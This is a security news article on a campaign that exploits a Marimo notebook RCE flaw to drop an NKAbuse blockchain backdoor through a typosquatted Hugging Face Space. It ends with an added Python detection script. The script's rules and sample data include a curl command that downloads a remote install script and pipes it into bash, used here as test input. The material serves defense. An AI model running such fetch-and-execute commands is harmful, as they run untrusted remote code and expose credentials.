Weaponized CVE-2026-39987 Pushes Blockchain Backdoor Through Hugging Face

GBHackers On Security, Apr 17, 2026

Why It Matters

The attack underscores the high value of AI/ML notebook environments and the danger of trusted platforms like Hugging Face being used for malware distribution, forcing organizations to rethink security for developer tooling and supply‑chain hygiene.

Key Takeaways

  • CVE-2026-39987 enables unauthenticated RCE in Marimo notebooks.
  • Attackers deliver NKAbuse via a Hugging Face Space typosquat.
  • Dropped kagent binary uses NKN blockchain for resilient C2.
  • Threat actors harvest cloud keys, DB URLs, and Redis credentials.
  • Immediate patching and network segmentation are critical defenses.

Pulse Analysis

Marimo notebooks have become a staple for data scientists, offering an interactive environment that often runs with elevated privileges and direct access to cloud credentials. The newly disclosed CVE‑2026‑39987 bypasses authentication, allowing attackers to execute arbitrary commands on any exposed instance. The speed of exploitation—under ten hours after the advisory—demonstrates how quickly threat actors can weaponize fresh vulnerabilities, especially when the affected software is widely adopted in fast‑moving AI development pipelines.

The campaign’s novelty lies in its use of Hugging Face Spaces as a distribution hub. By registering a typosquatted space named vsccode‑modetx, the attackers leveraged the platform’s reputation to host a dropper script that fetches a UPX‑packed Go binary, kagent. This binary belongs to the NKAbuse family, which communicates via the NKN blockchain, providing a decentralized, hard‑to‑block command‑and‑control channel. Such supply‑chain abuse mirrors earlier Android RAT incidents, but now targets the burgeoning AI/ML developer ecosystem, where code execution can translate directly into cloud‑native compromise.

Defenders must adopt a multi‑layered approach. Immediate remediation includes patching Marimo instances and enforcing strict authentication for notebook access. Network segmentation can limit lateral movement to backend services like PostgreSQL and Redis. Organizations should also monitor for anomalous curl‑pipe‑bash patterns, hidden kagent directories, and outbound NKN traffic. Treating repositories on Hugging Face, GitHub, and PyPI as untrusted by default—combined with content inspection and allow‑listing—will mitigate future supply‑chain threats and protect critical AI workloads.
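
One way to implement the command-line part of that monitoring, as an added example that is not from the original article: it tags process command lines that pipe a download into a shell, reference a Hugging Face host, or touch a hidden kagent directory. The sample command lines, the placeholder Space path and the definition of a "hidden kagent directory" are assumptions; outbound NKN traffic is not covered here.

```python
import re

# curl/wget output piped directly into a shell interpreter.
FETCH_PIPE_SHELL = re.compile(
    r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b")
# URL whose host is huggingface.co or a *.hf.space subdomain (exact suffix).
HF_URL = re.compile(
    r"https?://(?:[\w-]+\.)*(?:huggingface\.co|hf\.space)(?![\w.-])", re.I)
# Assumption: a "hidden kagent directory" is a dot-prefixed path component
# whose name contains "kagent"; the article does not give the exact path.
HIDDEN_KAGENT_DIR = re.compile(r"(?:^|[\s/])\.[\w.-]*kagent[\w.-]*/")

RULES = [
    ("fetch_pipe_shell", FETCH_PIPE_SHELL),
    ("hf_url", HF_URL),
    ("hidden_kagent_dir", HIDDEN_KAGENT_DIR),
]

def classify(cmdline):
    """Return the names of all rules that match one process command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan(cmdlines):
    """Return (index, tags) for every command line that matched a rule."""
    hits = []
    for i, line in enumerate(cmdlines):
        tags = classify(line)
        if tags:
            hits.append((i, tags))
    return hits

# Constructed sample command lines (not taken from the campaign).
SAMPLE = [
    'bash -c "curl -fsSL https://huggingface.co/spaces/EXAMPLE-USER/EXAMPLE-SPACE/resolve/main/install.sh | bash"',
    "/home/app/.kagent/kagent",
    "curl -s https://example.org/data.json -o /tmp/data.json",
    "curl -s https://example.org/api | jq .",
    "python -m pip install --upgrade marimo",
]

if __name__ == "__main__":
    for idx, tags in scan(SAMPLE):
        print(f"ALERT {','.join(tags)}: {SAMPLE[idx]}")
```

A Hugging Face URL on its own is routine in ML environments, so the `hf_url` tag is most useful when it coincides with `fetch_pipe_shell` on a notebook host.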
